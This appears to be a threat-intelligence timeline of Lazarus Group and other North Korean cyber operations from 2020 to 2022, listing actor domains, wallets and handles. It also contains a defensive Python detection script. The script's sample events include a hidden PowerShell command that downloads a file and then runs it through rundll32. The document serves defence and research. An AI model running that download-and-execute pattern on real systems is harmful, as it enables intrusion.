Date:: 2020-12-15 URL:: https://www.hvs-consulting.de/public/ThreatReport-Lazarus.pdf Tags:: Details::

  • Stayed in the victims' systems for months on end
  • Initial contact in Feb 2020
  • Payload delivered in Q2/Q3
  • Data exfiltration in Q2, Q3 and Q4 2020
  • By using spear-phishing methods, members of Lazarus Group posed as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 research. Indicators::

2021

Chainalysis Report: North Korean Hackers Crypto Holdings Reach All-time High

Date:: 2021-01-01 URL:: https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf Tags:: Money Laundering Details::

  • North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
  • These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected hot wallets into DPRK-controlled addresses.
  • Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as Lazarus Group, which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
  • While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
  • From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
  • Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
  • In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
  • The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
  • More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
  • Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
  • DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
  • Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old. Indicators::

Google TAG report on a new campaign targeting security researchers

Date:: 2021-01-25 URL:: https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa Tags:: Details::

  • Government-backed entity based in North Korea; targeting of security researchers via social media.
  • the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
  • Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including guest posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
  • After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
  • In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn.io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
  • These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email Indicators::

ThreatNeedle

Date:: 2021-01-27 URL:: https://medium.com/s2wblog/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74 https://x.com/unpacker/status/1354203847455956995 Tags:: ThreatNeedle Details::

  • We already disclosed the deep analysis regarding C2 communication of ThreatNeedle at DCC 2019 and the Kaspersky SAS Lightning Talk 2019. In addition, the malware and its C2 communication have characteristics in common with Operation MalBus.
  • Additional reference for Operation MalBus: MalBus Actor Changed Market from Google Play to ONE Store
  • We briefly deliver only the essential facts on Medium; for other details, please refer to the attached PDF file which was presented at DCC and Kaspersky SAS. Indicators::

Microsoft: ZINC attacks against security researchers

Date:: 2021-01-28 URL:: https://microsoft.com/en-us/security/blog/2021/01/28/zinc-attacks-against-security-researchers/ Tags:: CVE Details::

  • A pre-build event with a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event is an innovative technique to gain execution.
  • Klackring malware
  • In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.
  • In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT eXplorer antivirus. The file was dropped to the victim system as C:\Windows\System32\drivers\circlassio.sys. The actor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver’s own code which crashed the victim’s machine.
  • Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https://codevexillium.org. The host DLL (SHA-256: ada7e80c…) was downloaded to the path C:\ProgramData\USOShared\USOShared.bin using PowerShell and then ran via rundll32. This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it dropped to C:\ProgramData\USOShared\USOShared.dat. Indicators::
  • Actor-controlled Twitter Handles
  • Twitter:: z055g
  • Twitter:: james0x40
  • Twitter:: mvp4p3r
  • Twitter:: dev0exp
  • Twitter:: BrownSec3Labs
  • Twitter:: br0vvnn
  • Twitter:: 0xDaria
  • LinkedIn:: james-williamson-55a9b81a6
  • LinkedIn:: guo-zhang-b152721bb
  • LinkedIn:: linshuang-li-aa69391bb
  • br0vvnn
  • dev0exp
  • henya290
  • james0x40
  • tjrim91
  • br0vvnn.io
  • blog.br0vvnn.io
  • codevexillium.org
  • angeldonationblog.com
  • investbooking.de
  • krakenfolio.com
  • codevexillium.org/image/download/download.asp
  • angeldonationblog.com/image/upload/upload.php
  • www.dronerc.it/shop_testbr/Core/upload.php
  • www.dronerc.it/forum/uploads/index.php
  • www.dronerc.it/shop_testbr/upload/upload.php
  • www.edujikim.com/intro/blue/insert.asp
  • investbooking.de/upload/upload.asp
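As an added defensive example (not code from Microsoft, Google TAG or this page's author), the Python below runs four detection rules over a handful of constructed process-creation and driver-load events that follow the patterns the Google TAG entry above and this Microsoft ZINC entry describe: rundll32 launched from build tooling or a script host (the pre-build-event technique), rundll32 handed a non-.dll module under C:\ProgramData (the USOShared.bin launch), PowerShell downloading a file into ProgramData, and a driver load whose SHA-256 is on a watchlist (the dropped circlassio.sys case). The `key=value|key=value` log format, the rule names, the watchlist hash and the example.invalid URL are assumptions made for this example; only the file paths reuse the ones the Microsoft write-up names.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry in a simplified Sysmon-like "key=value|key=value"
# form. These are not real logs from the incidents: the file paths reuse the
# ones named in the Microsoft ZINC write-up, the hash is a placeholder.
SAMPLE_EVENTS = [
    # 1. Benign: Visual Studio driving a normal MSBuild build.
    r"EventID=1|Image=C:\Program Files\Microsoft Visual Studio\2019\MSBuild\Current\Bin\MSBuild.exe|ParentImage=C:\Program Files\Microsoft Visual Studio\2019\Common7\IDE\devenv.exe|CommandLine=MSBuild.exe Project.sln",
    # 2. Suspicious: PowerShell (as run from a pre-build event) spawning rundll32
    #    on a non-.dll file under ProgramData.
    r"EventID=1|Image=C:\Windows\System32\rundll32.exe|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=rundll32.exe C:\ProgramData\USOShared\USOShared.bin,Open",
    # 3. Suspicious: PowerShell downloading a file straight into ProgramData.
    r"EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=powershell -w hidden (New-Object Net.WebClient).DownloadFile('https://example.invalid/u.bin','C:\ProgramData\USOShared\USOShared.bin')",
    # 4. Benign: rundll32 loading a real system DLL on behalf of Explorer.
    r"EventID=1|Image=C:\Windows\System32\rundll32.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    # 5. Suspicious: driver load whose SHA-256 is on a watchlist (placeholder hash).
    r"EventID=6|ImageLoaded=C:\Windows\System32\drivers\circlassio.sys|Hashes=SHA256=0000000000000000000000000000000000000000000000000000000000000001|Signature=Example Vendor",
]

# Parents that should rarely need to launch rundll32 directly: build tooling
# (the pre-build-event technique) and script hosts.
BUILD_OR_SCRIPT_PARENTS = {"msbuild.exe", "devenv.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer")
# Constructed placeholder; in practice populate from an abused-driver hash list.
DRIVER_HASH_WATCHLIST = {
    "0000000000000000000000000000000000000000000000000000000000000001",
}

R1 = "R1_rundll32_spawned_by_build_or_script_host"
R2 = "R2_rundll32_loads_non_dll_from_programdata"
R3 = "R3_powershell_download_into_programdata"
R4 = "R4_driver_load_hash_on_watchlist"


def parse_event(line):
    """Split 'k=v|k=v' into a dict; only the first '=' of a field separates key and value."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def _basename(path):
    return PureWindowsPath(path).name.lower()


def _rundll32_module(cmdline):
    """Return the module argument passed to rundll32 (text up to ',EntryPoint')."""
    m = re.search(r'rundll32(?:\.exe)?\s+"?([^",]+)', cmdline, re.IGNORECASE)
    return m.group(1).strip() if m else None


def _sha256_of(hashes_field):
    """Pick the SHA256 digest out of a Sysmon-style 'ALGO=hex,ALGO=hex' field."""
    for item in hashes_field.split(","):
        algo, _, digest = item.partition("=")
        if algo.strip().upper() == "SHA256":
            return digest.strip().lower()
    return None


def check_event(ev):
    """Apply the four rules to one parsed event and return the rule ids that fire."""
    hits = []
    if ev.get("EventID") == "1":  # process creation
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if image == "rundll32.exe":
            if parent in BUILD_OR_SCRIPT_PARENTS:
                hits.append(R1)
            module = _rundll32_module(cmd)
            if module:
                low = module.lower()
                if low.startswith("c:\\programdata\\") and not low.endswith(".dll"):
                    hits.append(R2)
        elif image in ("powershell.exe", "pwsh.exe"):
            low = cmd.lower()
            if any(mk in low for mk in DOWNLOAD_MARKERS) and "\\programdata\\" in low:
                hits.append(R3)
    elif ev.get("EventID") == "6":  # driver load
        if _sha256_of(ev.get("Hashes", "")) in DRIVER_HASH_WATCHLIST:
            hits.append(R4)
    return hits


def scan(lines):
    """Return (1-based line number, rule id) pairs for every rule that fires."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for rule in check_event(parse_event(line)):
            findings.append((number, rule))
    return findings


if __name__ == "__main__":
    for number, rule in scan(SAMPLE_EVENTS):
        print(f"line {number}: {rule}")
```

The fields used map onto Sysmon Event ID 1 (process creation) and Event ID 6 (driver load). A real Visual Studio pre-build event passes through cmd.exe before PowerShell, so a production version of R1 would walk the full parent chain rather than look one level up, and all four rules need tuning against the normal activity of the build servers and developer workstations they are deployed on.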

Daily NK: Kim Jong Un is directly handling results of new COVID-19 hacking organization's work

Date:: 2021-02-05 URL:: https://dailynk.com/english/kim-jong-un-directly-handling-results-new-covid-19-hacking-organization-work/ Tags:: Details::

  • Group 325 is reportedly composed of talented members of existing hacking groups separately selected for the new organization, along with recently-hired top university graduates who majored in IT-related fields.
  • Their targets reportedly include major biochemistry and pharmaceutical labs, drug companies and important national administrative and intelligence bodies.
  • Targets not only South Korean government organizations and labs, but also major institutions in the United States and China. Indicators::

FASTCash grabs $6.1 million from BankIslami Pakistan Limited

Date:: 2021-02-17 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details:: Indicators::

FBI + CISA: Report on Operation AppleJeus Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale

Date:: 2021-02-17 URL:: https://cisa.gov/news-events/analysis-reports/ar21-048a https://us-cert.gov/ncas/analysis-reports/ar21-048a https://us-cert.gov/ncas/analysis-reports/ar21-048b https://us-cert.gov/ncas/analysis-reports/ar21-048c https://us-cert.gov/ncas/analysis-reports/ar21-048d https://us-cert.gov/ncas/analysis-reports/ar21-048e https://us-cert.gov/ncas/analysis-reports/ar21-048f https://us-cert.gov/ncas/analysis-reports/ar21-048g Tags:: Applejeus Details::

  • Targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency.
  • The malicious application, seen on both Windows and Mac operating systems, appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate.
  • In addition to infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.
  • Trojanized applications covered by the reports: Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale. Indicators::

Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist

Date:: 2021-02-20 URL:: https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and Tags:: Details::

  • Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
  • The United States Justice Department said Hushpuppi conspired with a Canadian-American citizen, Ghaleb Alaumary, and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
  • Hushpuppi is currently facing separate trial for conspiring to launder hundreds of millions of dollars from BEC frauds and other scams.
  • The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
  • Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
  • With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
  • Alaumary also conspired with Ramon Olorunwa Abbas, aka Ray Hushpuppi, and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams. Indicators::

First North Korean National Brought to the United States to Stand Trial for Money Laundering Offenses

Date:: 2021-03-22 URL:: https://justice.gov/opa/pr/first-north-korean-national-brought-united-states-stand-trial-money-laundering-offenses https://cnbc.com/2021/03/22/north-korea-national-extradited-to-us-faces-money-laundering-charges.html https://scmp.com/news/asia/east-asia/article/3126520/north-korean-businessman-mun-chol-myong-us-court-after Tags:: Details::

  • According to the indictment and other court documents unsealed today, between April 2013 and November 2018, Mun and others conspired to covertly and fraudulently access the U.S. financial system. Mun is alleged to have defrauded U.S. banks and violated both U.S. and United Nations (U.N.) sanctions as part of his money laundering activities in transactions valued at over $1.5 million. The indictment further alleges that Mun was affiliated with the DPRK’s primary intelligence organization, the Reconnaissance General Bureau, which is the subject of U.S. and U.N. sanctions.
  • According to the indictment, Mun and his conspirators went to great lengths to avoid detection of their sanctions-busting operation. They used a web of front companies and bank accounts registered to false names and removed references to the DPRK from international wire transfer and transactional documents. By intentionally concealing that their transactions were for the benefit of DPRK entities, Mun and his conspirators deceived U.S. correspondent banks into processing U.S. dollar transactions for the benefit of DPRK entities, which the correspondent banks would have otherwise not processed.
    Indicators::

A NEW NFT&DeFi TECH (PROTECTED).docx

Date:: 2021-04-11 URL:: https://x.com/fr0s7_/status/1381328726819020804 Tags:: Details::

  • Seems to be targeting cryptocurrency organizations Indicators::
  • protectoffice[.]club:443//h4H3xZIm7cP/vjQ8Kx5Bih/KuaP%2BDcd/

AppleJeus: Analysis of North Korea’s Cryptocurrency Malware

Date:: 2021-04-15 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa21-048a Tags:: Applejeus Details:: Indicators::

Lazarus BTC Changer: Back in action with JS sniffers redesigned to steal crypto

Date:: 2021-04-21 URL:: https://group-ib.com/blog/btc-changer/ Tags:: Details::

  • Group-IB researchers analyzed the newly discovered attacks, described the links with the clientToken= campaign, analyzed the transactions associated with the wallets controlled by the gang, and estimated Lazarus’ profits from the use of crypto-stealing JS-sniffers at 0.89993859 BTC ($8,446.55 at the moment of the transaction and $52,611 as of April 9, 2021) and 4.384719 ETH, ($9,047 as of April 9, 2021). Indicators::
  • 0x460ab1c34e4388704c5e56e18D904Ed117D077CC
  • 1Gf8U7UQEJvMXW5k3jtgFATWUmQXVyHkJt
  • 1MQC6C4FVX8RhmWESWsazEb5dyDBhxH9he
  • 1DjyE7WUCz9DLabw5EWAuJVpUzXfN4evta

The Incredible Rise of North Korea’s Hacking Army: Lazarus Group’s criminal enterprises, including cryptocurrency exchange heists and ransomware attacks

Date:: 2021-04-26 URL:: https://newyorker.com/magazine/2021/04/26/the-incredible-rise-of-north-koreas-hacking-army Tags:: Details:: Indicators::

ClearSky: Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus

Date:: 2021-05-24 URL:: https://clearskysec.com/cryptocore-lazarus-attribution/ https://clearskysec.com/cryptocore-group/ Tags:: DangerousPassword Details::

  • The campaign is also known as CryptoMimic, Dangerous Password and Leery Turtle. Indicators::

ClearSky: Report on the Crypto Core APT group attributing it to the North Korean Lazarus APT

Date:: 2021-06-03 URL:: https://clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf Tags:: Details:: Indicators::

Andariel evolves to target South Korea with ransomware

Date:: 2021-06-15 URL:: https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ Tags:: Andariel Details::

  • In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by the Korean Financial Security Institute as a sub-group of Lazarus.
  • Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
  • From mid-2020 onwards, they have leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs. Indicators::

Hushpuppi: The Fall of the Billionaire Gucci Master

Date:: 2021-06-30 URL:: https://bloomberg.com/features/2021-hushpuppi-gucci-influencer/ Tags:: Money Laundering Details::

  • Authorities say Ramon Abbas, aka Hushpuppi, perfected a simple internet scam and laundered millions of dollars. His past says a lot about digital swagger, and the kinds of stories that get told online. Indicators::

The Lazarus Heist: Where Are They Now?

Date:: 2021-08-08 URL:: https://blog.bushidotoken.net/2021/08/the-lazarus-heist-where-are-they-now.html Tags:: Details::

  • The North Korean government has heavily invested in its computer network operations. From tracking North Korean APT campaigns and victim disclosure notifications over the years we can establish what North Korea's priority intelligence requirements (PIRs) are. For a semi-isolated regime that struggles to generate resources legitimately, its current set of PIRs is unsurprising. North Korea is heavily sanctioned and unable to access many things we take for granted. Organised cybercrime campaigns have become a significant and reliable way for the North Korean regime to continue existing. Indicators::

North Korean Cyberattacks: A Dangerous and Evolving Threat

Date:: 2021-09-02 URL:: https://heritage.org/asia/report/north-korean-cyberattacks-dangerous-and-evolving-threat Tags:: Details::

  • North Korea has conducted cyber guerrilla warfare to steal classified military secrets, absconded with billions of dollars in money and cybercurrency, held computer systems hostage, and inflicted extensive damage on computer networks. Defending against Pyongyang’s cyberattacks requires the same constant vigilance and rapidly evolving methods and techniques that law enforcement agencies had to use in response to its evasion of sanctions. The United States has taken only limited actions against North Korean hackers and foreign countries that allow them to operate and launder money from cybercrimes. Without a firm response from the U.S., the North Korean regime will continue to undermine the effectiveness of international sanctions and could inflict even greater damage during a crisis or military conflict. Indicators::

Rapid Change of Stablecoin (Protected).docx, secure.azureword.com, Z Venture Capital Presentation(Protected).docx

Date:: 2021-09-10 URL:: https://x.com/Circuitous/status/1436456000584880129 https://x.com/Circuitous/status/1442888312755302400 Tags:: Details:: Indicators::

North Korea Is Targeting South Korea's Bitcoin Exchanges, Report Claims

Date:: 2021-09-13 URL:: https://www.coindesk.com/markets/2017/09/12/north-korea-is-targeting-south-koreas-bitcoin-exchanges-report-claims Tags:: Details::

  • "Since May 2017, we have observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds," Luke McNamara, a senior cyber threat intelligence analyst at FireEye, wrote in a blog post published Monday. "The spearphishing we have observed in these cases often targets personal email accounts of employees at digital currency exchanges, frequently using tax-themed lures and deploying malware ... linked to North Korean actors suspected to be responsible for intrusions into global banks in 2016." Indicators::

Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors

Date:: 2021-09-16 URL:: https://justice.gov/opa/pr/international-money-launderer-sentenced-more-11-years-prison-laundering-millions-dollars Tags:: Money Laundering Details:: Indicators::

Multi-Universe Of Adversary: Multiple Campaigns Of Lazarus Group And Its Connection

Date:: 2021-10-07 URL:: https://vblocalhost.com/uploads/VB2021-Park.pdf Tags:: Applejeus, ThreatNeedle, DeathNote Details::

  • Campaign summary from the paper, listed as campaign - initial infection vectors - malware components:
  • AppleJeus - Trojanized application, spear phishing, contact through social media, use of Telegram channel - Installer, downloader, loader, backdoor
  • ThreatNeedle - Spear phishing, trojanized application (a well-known program), watering hole, contact through social media - Installer, downloader, loader, injector, backdoor
  • DeathNote - Spear phishing, trojanized application (PDF reader) - Downloader, backdoor
  • Bookcode - Watering hole, trojanized application (a security program) - Installer, injector, backdoor
  • CookieTime - Spear phishing, trojanized application (a well-known program) - Downloader, loader, backdoor
  • Mata - Exploitation of a vulnerable network device - Loader, orchestrator, plug-ins Indicators::

2022

North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High

Date:: 2022-01-13 URL:: https://blog.chainalysis.com/reports/north-korean-hackers-have-prolific-year-as-their-total-unlaundered-cryptocurrency-holdings-reach-all-time-high/ Tags:: Money Laundering Details:: Indicators::

Kaspersky Report: SnatchCrypto Campaign

Date:: 2022-01-13 URL:: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/ Tags:: BlueNoroff Details:: Indicators::

In the spotlight: Lazarus Group

Date:: 2022-01-31 URL:: https://cybersecurity-help.cz/blog/2511.html Tags:: Details::

  • North Korea-linked advanced persistent threat (APT) groups are considered to be the world’s most advanced threat actors, on par with Russian, Chinese, or Iranian APTs. When conducting their operations, North Korean state-backed hackers leverage a wide array of sophisticated techniques, including the exploitation of zero-day vulnerabilities, the use of custom malware tools, as well as destructive malware and ransomware, and clever evasion and persistence mechanisms in order to fly under radar. Indicators::

North Korea Hacked Him. So He Took Down Its Internet

Date:: 2022-02-02 URL:: https://wired.com/story/north-korea-hacker-internet-outage/ Tags:: Details:: Indicators::

What Wicked Webs We Un-Weave

Date:: 2022-03-15 URL:: https://prevailion.com/what-wicked-webs-we-unweave/ https://x.com/PhantomXSec/status/1566219671057371136 https://x.com/PhantomXSec/status/1566219713600196608 Tags:: Details:: Indicators::

CVE-2022-1096 reported by an anonymous researcher (type confusion in V8)

Date:: 2022-03-23 URL:: https://security.gentoo.org/glsa/202208-25 Tags:: CVE Details:: Indicators::

Mandiant: Mapping DPRK Cyber Threat Groups to Government Organizations

Date:: 2022-03-23 URL:: https://mandiant.com/resources/mapping-dprk-groups-to-government Tags:: Details::

  • The country's espionage operations are believed to be reflective of the regime's immediate concerns and priorities, which are likely currently focused on acquiring financial resources through crypto heists, targeting of media, news, and political entities, information on foreign relations and nuclear information, and a slight decline in the once spiked stealing of COVID-19 vaccine research. Information collected in these campaigns will possibly be used to develop or produce internal items and strategies, such as vaccines, mitigations to bypass sanctions, funding for the country’s weapons programs, and so on. Additional information continues to be collected to determine the extent to which these groups operate and streamline their operations. Being able to see through the intentional fog left by North Korean leadership, and to identify targeting patterns that align to physical units, allows for a proactive defense against these cyber operators. This effort is critical in a country where little is known to the outside world and defector reporting supplemented with cyber operations can help. Indicators::

CVE-2022-0609: Google posts update about zero-day CVE-2022-0609 used in Operation DreamJob and Operation AppleJeus

Date:: 2022-03-24 URL:: https://blog.google/threat-analysis-group/countering-threats-north-korea/ Tags:: Applejeus, Operation DreamJob, CVE Details::

  • TAG discovered two distinct North Korean attacker groups exploiting a remote code execution vulnerability in Chrome.
  • Operation DreamJob + Operation AppleJeus
  • Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
  • Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
  • Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
  • The campaign begins by sending targets phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites spoofing Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected via drive-by browser downloads. The North Korean groups were utilizing an exploit kit (CVE-2022-0609) served through hidden iframes embedded into a variety of websites. The kit may fingerprint target devices by collecting details such as user-agent and screen resolution before serving the exploit. The exploit kit then executed a Chrome remote code execution exploit capable of escaping the Chrome sandbox to reach the underlying system.
  • 2022-01-04 - CVE-2022-0609 - Earliest sighting of this particular kit
  • 2022-02-10 - CVE-2022-0609 - Reported by Google TAG's Clément Lecigne (use-after-free in Animation)
  • 2022-02-14 - CVE-2022-0609 - Chrome update released fixing the use-after-free in Animation Indicators::

CVE-2022-1096 Chrome update released (type confusion in V8)

Date:: 2022-03-25 URL:: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html Tags:: CVE Details:: Indicators::

Lazarus Trojanized DeFi app for delivering malware

Date:: 2022-03-31 URL:: https://securelist.com/lazarus-trojanized-defi-app/106195/ Tags:: Details::

  • We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, Indicators::

APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users

Date:: 2022-04-12 URL:: https://nsfocusglobal.com/apt-group-lazarus-distributing-korean-phishing-lures-to-feel-out-cryptocurrency-users/ Tags:: Details::

  • In this attack, Lazarus built a type of decoy document containing an AhnLab icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities.
  • Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform. Indicators::
  • 확인자료 _20220329.docx (Confirm data_20220329)
  • 202203_BTC_ETH_추가계정정보 (202203_BTC_ETH_Other account information)
  • 202203_BTC_ETH_자동매매계정정보 (202203_BTC_ETH_Auto Trading Account Information)
  • 202204_암호화폐_투자기획.docx (202204_Cryptocurrency_Investment Planning)
  • NFT 분할.docx (NFT allocation)
  • Binance_Guide (1).doc (Binance_Tutorial (1))

CVE-2022-1364: Reported by Google TAG's Clément Lecigne

Date:: 2022-04-13 URL:: https://issues.chromium.org/issues/40059369 Tags:: CVE Details::

  • Type Confusion, V8 Engine Indicators::

CVE-2022-1364 Chrome Update Released, everyone told to update urgently

